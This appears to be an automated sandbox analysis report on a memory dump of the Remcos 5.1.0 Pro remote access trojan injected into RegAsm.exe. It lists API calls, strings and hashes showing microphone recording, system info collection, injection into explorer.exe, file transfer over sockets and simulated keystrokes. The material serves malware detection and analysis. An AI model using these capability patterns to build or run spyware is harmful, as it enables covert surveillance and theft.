                      • String ID: 6/
                      • API String ID: 1324828854-4212659297
                      • Opcode ID: c8cde1f94c5a3c187481f919a86e285046f284bf183baf255f965bcae4dd5098
                      • Instruction ID: 7b1e32e7ca62d622bc6abd4954a79b3a1191cf35157f5551c2bc05612337e78d
                      • Opcode Fuzzy Hash: c8cde1f94c5a3c187481f919a86e285046f284bf183baf255f965bcae4dd5098
                      • Instruction Fuzzy Hash: D7519271D00249AFEB10CFA4CC95BDEBBF8EF09350F15811AE955E7295D731AA41CB60
                      APIs
                      • ShellExecuteW.SHELL32(00000000,open,dxdiag,00000000,00000000,00000000), ref: 004174F5
                        • Part of subcall function 0041C485: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,00000000,0040A843), ref: 0041C49E
                      • Sleep.KERNEL32(00000064), ref: 00417521
                      • DeleteFileW.KERNEL32(00000000), ref: 00417555
                      Strings
                      Memory Dump Source
                      • Source File: 00000003.00000002.2928318861.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000003.00000002.2928318861.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                      • Associated: 00000003.00000002.2928318861.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                      Yara matches
                      Similarity
                      • API ID: File$CreateDeleteExecuteShellSleep
                      • String ID: /t $\sysinfo.txt$dxdiag$open$temp
                      • API String ID: 1462127192-2001430897
                      • Opcode ID: 16364c1897529391295d412ac0c8bd5d579eac589ee2064f359b93f2d9aa00dd
                      • Instruction ID: 51d64fe7c8a5c54eac4555a52c350958ac4104e8f54c8767ba2a87230734c78e
                      • Opcode Fuzzy Hash: 16364c1897529391295d412ac0c8bd5d579eac589ee2064f359b93f2d9aa00dd
                      • Instruction Fuzzy Hash: 1431307194011A9ADB04FB62DC96DED7779AF50309F40017EF606730E2EF785A8ACA9C
                      APIs
                      • GetCurrentProcess.KERNEL32(00472B14,00000000,004752D8,00003000,00000004,00000000,00000001), ref: 004073DD
                      • GetCurrentProcess.KERNEL32(00472B14,00000000,00008000,?,00000000,00000001,00000000,00407656,C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe), ref: 0040749E
                      Strings
                      Memory Dump Source
                      • Source File: 00000003.00000002.2928318861.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000003.00000002.2928318861.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                      • Associated: 00000003.00000002.2928318861.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                      Yara matches
                      Similarity
                      • API ID: CurrentProcess
                      • String ID: PEB: %x$[+] NtAllocateVirtualMemory Success$[-] NtAllocateVirtualMemory Error$\explorer.exe$explorer.exe$windir
                      • API String ID: 2050909247-4242073005
                      • Opcode ID: 105ebb0f8990cefe91757f1d0024cf73e91af1221990972c55416f3ee457c51f
                      • Instruction ID: f630994b7aed3d2c1b9b8fa2b3e4f68b22e8b08ead4833dea6669ff7d567ef23
                      • Opcode Fuzzy Hash: 105ebb0f8990cefe91757f1d0024cf73e91af1221990972c55416f3ee457c51f
                      • Instruction Fuzzy Hash: 7031A471A04700ABD321FF65ED46F167BB8AB44305F10087EF515A6292E7B8B8448B6F
                      APIs
                      • _strftime.LIBCMT ref: 00401D50
                        • Part of subcall function 00401A6D: CreateFileW.KERNEL32(00000000,40000000,00000000), ref: 00401AD9
                      • waveInUnprepareHeader.WINMM(00472A88,00000020,00000000,?), ref: 00401E02
                      • waveInPrepareHeader.WINMM(00472A88,00000020), ref: 00401E40
                      • waveInAddBuffer.WINMM(00472A88,00000020), ref: 00401E4F
                      Strings
                      Memory Dump Source
                      • Source File: 00000003.00000002.2928318861.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000003.00000002.2928318861.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                      • Associated: 00000003.00000002.2928318861.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                      Yara matches
                      Similarity
                      • API ID: wave$Header$BufferCreateFilePrepareUnprepare_strftime
                      • String ID: %Y-%m-%d %H.%M$.wav$dMG$|MG
                      • API String ID: 3809562944-243156785
                      • Opcode ID: ad8ba90a2921d66a3c12ccf8c1a2d8e4c0e0e91c69b7ff21a65ebece821e0ee7
                      • Instruction ID: 027c37fd5a1300b84eaed5fd93cda356eabc1c7fedb6cd9f381e221a57c36ff8
                      • Opcode Fuzzy Hash: ad8ba90a2921d66a3c12ccf8c1a2d8e4c0e0e91c69b7ff21a65ebece821e0ee7
                      • Instruction Fuzzy Hash: 383181315043019FC324EB21DD46A9A77A8EB84314F40443EF18DA21F2EFB89A49CB5E
                      APIs
                      • std::_Lockit::_Lockit.LIBCPMT ref: 00410E6E
                      • int.LIBCPMT ref: 00410E81
                        • Part of subcall function 0040E0C1: std::_Lockit::_Lockit.LIBCPMT ref: 0040E0D2
                        • Part of subcall function 0040E0C1: std::_Lockit::~_Lockit.LIBCPMT ref: 0040E0EC
                      • std::_Facet_Register.LIBCPMT ref: 00410EC1
                      • std::_Lockit::~_Lockit.LIBCPMT ref: 00410ECA
                      • __CxxThrowException@8.LIBVCRUNTIME ref: 00410EE8
                      • __Init_thread_footer.LIBCMT ref: 00410F29
                      Strings
                      Memory Dump Source
                      • Source File: 00000003.00000002.2928318861.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000003.00000002.2928318861.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                      • Associated: 00000003.00000002.2928318861.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                      Yara matches
                      Similarity
                      • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_Init_thread_footerRegisterThrow
                      • String ID: ,kG$0kG
                      • API String ID: 3815856325-2015055088
                      • Opcode ID: e0f3714a3daeaf8b288ae2a542907f179217b7f89c568a0a8b7367a1e9159da3
                      • Instruction ID: 12cf7b7900226bd12227407fb3b1cbab205c4dd0745ae636880afd2a72082c2f
                      • Opcode Fuzzy Hash: e0f3714a3daeaf8b288ae2a542907f179217b7f89c568a0a8b7367a1e9159da3
                      • Instruction Fuzzy Hash: 162134329005249BC704EB6AD9428DE37A8EF48324F20056FF804A72D1DBB9AD81CB9D
                      APIs
                      • CreateDirectoryW.KERNEL32(00000000,00000000), ref: 00401BF9
                      • waveInOpen.WINMM(00472AC0,000000FF,00472AA8,Function_00001D0B,00000000,00000000,00000024), ref: 00401C8F
                      • waveInPrepareHeader.WINMM(00472A88,00000020), ref: 00401CE3
                      • waveInAddBuffer.WINMM(00472A88,00000020), ref: 00401CF2
                      • waveInStart.WINMM ref: 00401CFE
                      Strings
                      Memory Dump Source
                      • Source File: 00000003.00000002.2928318861.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000003.00000002.2928318861.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                      • Associated: 00000003.00000002.2928318861.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                      Yara matches
                      Similarity
                      • API ID: wave$BufferCreateDirectoryHeaderOpenPrepareStart
                      • String ID: dMG$|MG$PG
                      • API String ID: 1356121797-532278878
                      • Opcode ID: f67d326050ea03177529252cfca037bf538e61c655dad41bf55bf31ac8308c8f
                      • Instruction ID: ba088f7df0b955e0db37e5e5e2d8d6799d5f59e9c832501e8260ac80857d70f0
                      • Opcode Fuzzy Hash: f67d326050ea03177529252cfca037bf538e61c655dad41bf55bf31ac8308c8f
                      • Instruction Fuzzy Hash: 53212A71604201AFC739DF6AEE15A6A7BB6FB94715B00803FA10DD76B1DBB84881CB5C
                      APIs
                      • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 0041D476
                        • Part of subcall function 0041D50F: RegisterClassExA.USER32(00000030), ref: 0041D55B
                        • Part of subcall function 0041D50F: CreateWindowExA.USER32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,000000FD,00000000,00000000,00000000), ref: 0041D576
                        • Part of subcall function 0041D50F: GetLastError.KERNEL32 ref: 0041D580
                      • ExtractIconA.SHELL32(00000000,?,00000000), ref: 0041D4AD
                      • lstrcpynA.KERNEL32(00474B60,Remcos,00000080), ref: 0041D4C7
                      • Shell_NotifyIconA.SHELL32(00000000,00474B48), ref: 0041D4DD
                      • TranslateMessage.USER32(?), ref: 0041D4E9
                      • DispatchMessageA.USER32(?), ref: 0041D4F3
                      • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 0041D500
                      Strings
                      Memory Dump Source
                      • Source File: 00000003.00000002.2928318861.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000003.00000002.2928318861.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                      • Associated: 00000003.00000002.2928318861.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                      Yara matches
                      Similarity
                      • API ID: Message$Icon$ClassCreateDispatchErrorExtractFileLastModuleNameNotifyRegisterShell_TranslateWindowlstrcpyn
                      • String ID: Remcos
                      • API String ID: 1970332568-165870891
                      • Opcode ID: e379e7694b2aceffa08d25cf1e7e1f0c4c43df4e14370d432b5b71655a4afb2b
                      • Instruction ID: 4ccd8a34d55b2cf311069b5b9598b364b65d9d4e2968dcdf9eb94a5ca0393a4d
                      • Opcode Fuzzy Hash: e379e7694b2aceffa08d25cf1e7e1f0c4c43df4e14370d432b5b71655a4afb2b
                      • Instruction Fuzzy Hash: AC015271800245EBD7109FA5EC4CFEABB7CEB85705F004026F515930A1D778E885CB98
                      Memory Dump Source
                      • Source File: 00000003.00000002.2928318861.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000003.00000002.2928318861.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                      • Associated: 00000003.00000002.2928318861.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 7d049b86027effad8d92042d9403d5bfe2ea3e93186a839875c543696ca89538
                      • Instruction ID: c2c0890efeac2311cc0422bbb5d66c498191acafde20d8af94b1f6b0c86a236e
                      • Opcode Fuzzy Hash: 7d049b86027effad8d92042d9403d5bfe2ea3e93186a839875c543696ca89538
                      • Instruction Fuzzy Hash: 5AC1D770D04249AFEF11DFA9C881BAEBBB4EF09314F18415AE914A7392C77C9D41CB69
                      APIs
                      • GetCPInfo.KERNEL32(?,?), ref: 00453E2F
                      • MultiByteToWideChar.KERNEL32(?,00000009,?,?,00000000,00000000), ref: 00453EB2
                      • __alloca_probe_16.LIBCMT ref: 00453EEA
                      • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00453F45
                      • __alloca_probe_16.LIBCMT ref: 00453F94
                      • MultiByteToWideChar.KERNEL32(?,00000009,?,?,00000000,00000000), ref: 00453F5C
                        • Part of subcall function 00446137: RtlAllocateHeap.NTDLL(00000000,0043529C,?,?,00438847,?,?,00000000,?,?,0040DE62,0043529C,?,?,?,?), ref: 00446169
                      • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00453FD8
                      • __freea.LIBCMT ref: 00454003
                      • __freea.LIBCMT ref: 0045400F
                      Memory Dump Source
                      • Source File: 00000003.00000002.2928318861.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000003.00000002.2928318861.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                      • Associated: 00000003.00000002.2928318861.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                      Yara matches
                      Similarity
                      • API ID: ByteCharMultiWide$__alloca_probe_16__freea$AllocateHeapInfo
                      • String ID:
                      • API String ID: 201697637-0
                      • Opcode ID: cb909bb237894310d835953ab4abccfeb7062077920a6df16ad3eaeca36fe885
                      • Instruction ID: bd5a1837779a5f2dcb5c2ea5aeb828518df7829aba760434011a70bbc407b236
                      • Opcode Fuzzy Hash: cb909bb237894310d835953ab4abccfeb7062077920a6df16ad3eaeca36fe885
                      • Instruction Fuzzy Hash: E391F472E002069ADB209E65CC42AEFBBF59F09756F14052BFC01E7282D739DD89C768
                      APIs
                      • CopyFileW.KERNEL32(?,?,00000000,?,?,?,?,?,?,00000000), ref: 10001D1B
                      • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000080,00000000,?,?,00000000), ref: 10001D37
                      • DeleteFileW.KERNEL32(?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 10001D4B
                      • GetFileSize.KERNEL32(00000000,00000000,?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 10001D58
                      • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,?,00000000,?,?,?,?,?,?,00000000), ref: 10001D72
                      • CloseHandle.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,00000000), ref: 10001D7D
                      • DeleteFileW.KERNEL32(?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 10001D8A
                      Memory Dump Source
                      • Source File: 00000003.00000002.2931866265.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                      • Associated: 00000003.00000002.2931843207.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000003.00000002.2931866265.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_10000000_RegAsm.jbxd
                      Similarity
                      • API ID: File$Delete$CloseCopyCreateHandleReadSize
                      • String ID:
                      • API String ID: 1454806937-0
                      • Opcode ID: 95ffba8e0906de61fbf41533eef9bce15325b0b0370a179d90a4a5ca68fedbfa
                      • Instruction ID: 3114db45d92e83daf92c47a85baf70c14dd0292bf94a6379629bf72341f68b19
                      • Opcode Fuzzy Hash: 95ffba8e0906de61fbf41533eef9bce15325b0b0370a179d90a4a5ca68fedbfa
                      • Instruction Fuzzy Hash: 2221FCB594122CAFF710EBA08CCCFEF76ACEB08395F010566F515D2154D6709E458A70
                      APIs
                        • Part of subcall function 00448215: GetLastError.KERNEL32(00000020,?,0043A7F5,?,?,?,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B), ref: 00448219
                        • Part of subcall function 00448215: _free.LIBCMT ref: 0044824C
                        • Part of subcall function 00448215: SetLastError.KERNEL32(00000000,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B,?,00000041,00000000,00000000), ref: 0044828D
                        • Part of subcall function 00448215: _abort.LIBCMT ref: 00448293
                      • _memcmp.LIBVCRUNTIME ref: 00445423
                      • _free.LIBCMT ref: 00445494
                      • _free.LIBCMT ref: 004454AD
                      • _free.LIBCMT ref: 004454DF
                      • _free.LIBCMT ref: 004454E8
                      • _free.LIBCMT ref: 004454F4
                      Strings
                      Memory Dump Source
                      • Source File: 00000003.00000002.2928318861.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000003.00000002.2928318861.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                      • Associated: 00000003.00000002.2928318861.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                      Yara matches
                      Similarity
                      • API ID: _free$ErrorLast$_abort_memcmp
                      • String ID: C
                      • API String ID: 1679612858-1037565863
                      • Opcode ID: c1e41a01213cdbac3447a8ba434c9e48cb05e79aac4e6bdd2fadd948f06dfc8d
                      • Instruction ID: 551747f29a431029642ca2aca46be5bbca0cbe6c77a4b2ed9ddfbf6361621c56
                      • Opcode Fuzzy Hash: c1e41a01213cdbac3447a8ba434c9e48cb05e79aac4e6bdd2fadd948f06dfc8d
                      • Instruction Fuzzy Hash: B2B13975A016199BEB24DF18C884BAEB7B4FF08308F5045EEE949A7351E774AE90CF44
                      Strings
                      Memory Dump Source
                      • Source File: 00000003.00000002.2928318861.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000003.00000002.2928318861.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                      • Associated: 00000003.00000002.2928318861.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID: tcp$udp
                      • API String ID: 0-3725065008
                      • Opcode ID: 856ac91ac91911106c473792f8c7d8f31027b78cae10ba96d9f0cbb069fdbf0d
                      • Instruction ID: c6aeaafd44a905d145cb4251883953767b251f71b123717361be5a5837da4da2
                      • Opcode Fuzzy Hash: 856ac91ac91911106c473792f8c7d8f31027b78cae10ba96d9f0cbb069fdbf0d
                      • Instruction Fuzzy Hash: 637177B06083028FDB24CF65C480BABB7E4AFD4395F15442FF88986351E778DD858B9A
                      APIs
                      • MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,00000100,10006FFD,00000000,?,?,?,10008A72,?,?,00000100), ref: 1000887B
                      • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?,?,?,?,10008A72,?,?,00000100,5EFC4D8B,?,?), ref: 10008901
                      • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,5EFC4D8B,00000100,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 100089FB
                      • __freea.LIBCMT ref: 10008A08
                        • Part of subcall function 100056D0: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 10005702
                      • __freea.LIBCMT ref: 10008A11
                      • __freea.LIBCMT ref: 10008A36
                      Strings
                      Memory Dump Source
                      • Source File: 00000003.00000002.2931866265.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                      • Associated: 00000003.00000002.2931843207.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000003.00000002.2931866265.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_10000000_RegAsm.jbxd
                      Similarity
                      • API ID: ByteCharMultiWide__freea$AllocateHeap
                      • String ID: 6/
                      • API String ID: 1414292761-4212659297
                      • Opcode ID: bbd44e65680a142b819532ff26adde273e0ccd3bd0c95f1520c1a5c0857fc469
                      • Instruction ID: 3f57ce737592ef9202bcebfaa3f65c0582e3f3231b4dd00ae19a895c9b397c34
                      • Opcode Fuzzy Hash: bbd44e65680a142b819532ff26adde273e0ccd3bd0c95f1520c1a5c0857fc469
                      • Instruction Fuzzy Hash: 4F51CF72710216ABFB15CF60CC85EAB37A9FB417D0F11462AFC44D6148EB35EE509BA1
                      APIs
                      • __Init_thread_footer.LIBCMT ref: 004018BE
                      • ExitThread.KERNEL32 ref: 004018F6
                      • waveInUnprepareHeader.WINMM(?,00000020,00000000,?,00000020,00474EE0,00000000), ref: 00401A04
                        • Part of subcall function 00434770: __onexit.LIBCMT ref: 00434776
                      Strings
                      Memory Dump Source
                      • Source File: 00000003.00000002.2928318861.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000003.00000002.2928318861.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                      • Associated: 00000003.00000002.2928318861.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                      Yara matches
                      Similarity
                      • API ID: ExitHeaderInit_thread_footerThreadUnprepare__onexitwave
                      • String ID: PkG$XMG$NG$NG
                      • API String ID: 1649129571-3151166067
                      • Opcode ID: 01c11d85d7b0c86d0eca64ebafd574926eddfb1bbc99afceb993e39e8013429f
                      • Instruction ID: 5b8630810f78da979eb204bf693be1d55f2004797ab3201abec5cd50ea38d472
                      • Opcode Fuzzy Hash: 01c11d85d7b0c86d0eca64ebafd574926eddfb1bbc99afceb993e39e8013429f
                      • Instruction Fuzzy Hash: BF41B4312042109BC324FB26DD96ABE73A6AB85314F00453FF54AA61F2DF386D49C75E
                      APIs
                      • _ValidateLocalCookies.LIBCMT ref: 1000339B
                      • ___except_validate_context_record.LIBVCRUNTIME ref: 100033A3
                      • _ValidateLocalCookies.LIBCMT ref: 10003431
                      • __IsNonwritableInCurrentImage.LIBCMT ref: 1000345C
                      • _ValidateLocalCookies.LIBCMT ref: 100034B1
                      Strings
                      Memory Dump Source
                      • Source File: 00000003.00000002.2931866265.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                      • Associated: 00000003.00000002.2931843207.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000003.00000002.2931866265.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_10000000_RegAsm.jbxd
                      Similarity
                      • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                      • String ID: 6/$csm
                      • API String ID: 1170836740-2676140582
                      • Opcode ID: 314e045d64bd9dff90e147ebc0021a06731dbc25050b3dab86f6a1545ce1a07e
                      • Instruction ID: 0a936c430148d26a69835db3fa9f683d01d5328c1142e13f0191aacd949c771e
                      • Opcode Fuzzy Hash: 314e045d64bd9dff90e147ebc0021a06731dbc25050b3dab86f6a1545ce1a07e
                      • Instruction Fuzzy Hash: D141D678E042189BEB12CF68C880A9FBBF9EF453A4F10C155E9159F25AD731FA01CB91
                      APIs
                      • CreateFileW.KERNEL32(00000000,00000004,00000000,00000000,00000002,00000080,00000000,00000000,00474EE0,00465FA4,?,00000000,00407FFC,00000000), ref: 004079C5
                      • WriteFile.KERNEL32(00000000,?,00000000,000186A0,00000000,?,000186A0,?,?,00000000,00407FFC,00000000,?,?,0000000A,00000000), ref: 00407A0D
                        • Part of subcall function 00404AA1: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B36
                      • CloseHandle.KERNEL32(00000000,?,00000000,00407FFC,00000000,?,?,0000000A,00000000), ref: 00407A4D
                      • MoveFileW.KERNEL32(00000000,00000000), ref: 00407A6A
                      • CloseHandle.KERNEL32(00000000,00000057,?,00000008,?,?,?,?,?,?,?,0000000A,00000000), ref: 00407A95
                      • DeleteFileW.KERNEL32(00000000,?,?,?,?,?,?,?,0000000A,00000000), ref: 00407AA5
                        • Part of subcall function 00404B96: WaitForSingleObject.KERNEL32(00000000,000000FF,?,00474EF8,00404C49,00000000,00000000,00000000,?,00474EF8,?), ref: 00404BA5
                        • Part of subcall function 00404B96: SetEvent.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0040548B), ref: 00404BC3
                      Strings
                      Memory Dump Source
                      • Source File: 00000003.00000002.2928318861.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000003.00000002.2928318861.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                      • Associated: 00000003.00000002.2928318861.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                      Yara matches
                      Similarity
                      • API ID: File$CloseHandle$CreateDeleteEventMoveObjectSingleWaitWritesend
                      • String ID: .part
                      • API String ID: 1303771098-3499674018
                      • Opcode ID: f1cb0ead7d2d2b2a1caa9b1fbd2e08d67abddaf9d20ca2f7b8d78d50525d07aa
                      • Instruction ID: 3872d967715c28256f57216ae0d43a20e9ded80e7ed52efebe816600842ab993
                      • Opcode Fuzzy Hash: f1cb0ead7d2d2b2a1caa9b1fbd2e08d67abddaf9d20ca2f7b8d78d50525d07aa
                      • Instruction Fuzzy Hash: 7F318371508341AFC210EB21DC4599FB7A8FF94359F00493EB545A2192EB78EE48CB9A
                      APIs
                      • AllocConsole.KERNEL32(00475338), ref: 0041CDA4
                      • GetConsoleWindow.KERNEL32 ref: 0041CDAA
                      • ShowWindow.USER32(00000000,00000000), ref: 0041CDBD
                      • SetConsoleOutputCP.KERNEL32(000004E4), ref: 0041CDE2
                      Strings
                      Memory Dump Source
                      • Source File: 00000003.00000002.2928318861.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000003.00000002.2928318861.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                      • Associated: 00000003.00000002.2928318861.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                      Yara matches
                      Similarity
                      • API ID: Console$Window$AllocOutputShow
                      • String ID: Remcos v$5.1.0 Pro$CONOUT$
                      • API String ID: 4067487056-1043272453
                      • Opcode ID: 7204a5bae693ec2f4884850c6238c56aa94b879f8555490226ef59d43c8bca4e
                      • Instruction ID: 3d4e39fb732e2b6cb40f789e287104da8d9afdf675614735db993d10cd8ea689
                      • Opcode Fuzzy Hash: 7204a5bae693ec2f4884850c6238c56aa94b879f8555490226ef59d43c8bca4e
                      • Instruction Fuzzy Hash: CD0188719803087AD610F7F1DC8BF9D776C5B14705F6004277604A70D3E7BD9954466E
                      APIs
                      • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,?,0042DD01,?,?,?,0044AE9A,00000001,00000001,?), ref: 0044ACA3
                      • __alloca_probe_16.LIBCMT ref: 0044ACDB
                      • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,0042DD01,?,?,?,0044AE9A,00000001,00000001,?), ref: 0044AD29
                      • __alloca_probe_16.LIBCMT ref: 0044ADC0
                      • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,?,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 0044AE23
                      • __freea.LIBCMT ref: 0044AE30
                        • Part of subcall function 00446137: RtlAllocateHeap.NTDLL(00000000,0043529C,?,?,00438847,?,?,00000000,?,?,0040DE62,0043529C,?,?,?,?), ref: 00446169
                      • __freea.LIBCMT ref: 0044AE39
                      • __freea.LIBCMT ref: 0044AE5E
                      Memory Dump Source
                      • Source File: 00000003.00000002.2928318861.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000003.00000002.2928318861.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                      • Associated: 00000003.00000002.2928318861.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                      Yara matches
                      Similarity
                      • API ID: ByteCharMultiWide__freea$__alloca_probe_16$AllocateHeap
                      • String ID:
                      • API String ID: 3864826663-0
                      • Opcode ID: 118846f8b98fa7142c6fc34e08ba9c255994cc722e781db25b6080b075eb9fff
                      • Instruction ID: b5b01290aead076256688b5938d42e4b2a7c64905c3dece0b68445a47d4ef5f6
                      • Opcode Fuzzy Hash: 118846f8b98fa7142c6fc34e08ba9c255994cc722e781db25b6080b075eb9fff
                      • Instruction Fuzzy Hash: 1F513A72680206AFFB258F64CC41EBF77AAEB44714F24462EFC14D6240EB38DC60875A
                      APIs
                      • SendInput.USER32(00000001,?,0000001C,?,?,00000000), ref: 004199CC
                      • SendInput.USER32(00000001,?,0000001C,?,?,00000000,00000000), ref: 004199ED
                      • SendInput.USER32(00000001,?,0000001C,?,?,00000000,00000000), ref: 00419A0D
                      • SendInput.USER32(00000001,?,0000001C,?,?,00000000,00000000), ref: 00419A21
                      • SendInput.USER32(00000001,?,0000001C,?,?,00000000,00000000), ref: 00419A37
                      • SendInput.USER32(00000001,?,0000001C,?,?,00000000), ref: 00419A54
                      • SendInput.USER32(00000001,?,0000001C,?,?,00000000), ref: 00419A6F
                      • SendInput.USER32(00000001,?,0000001C,?,00000000), ref: 00419A8B
                      Memory Dump Source
                      • Source File: 00000003.00000002.2928318861.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000003.00000002.2928318861.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                      • Associated: 00000003.00000002.2928318861.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                      Yara matches
                      Similarity
                      • API ID: InputSend
                      • String ID:
                      • API String ID: 3431551938-0
                      • Opcode ID: f95364bfe09dcd8f200507449a759ee15de787b6f4e4bd27b79311205e9f388b
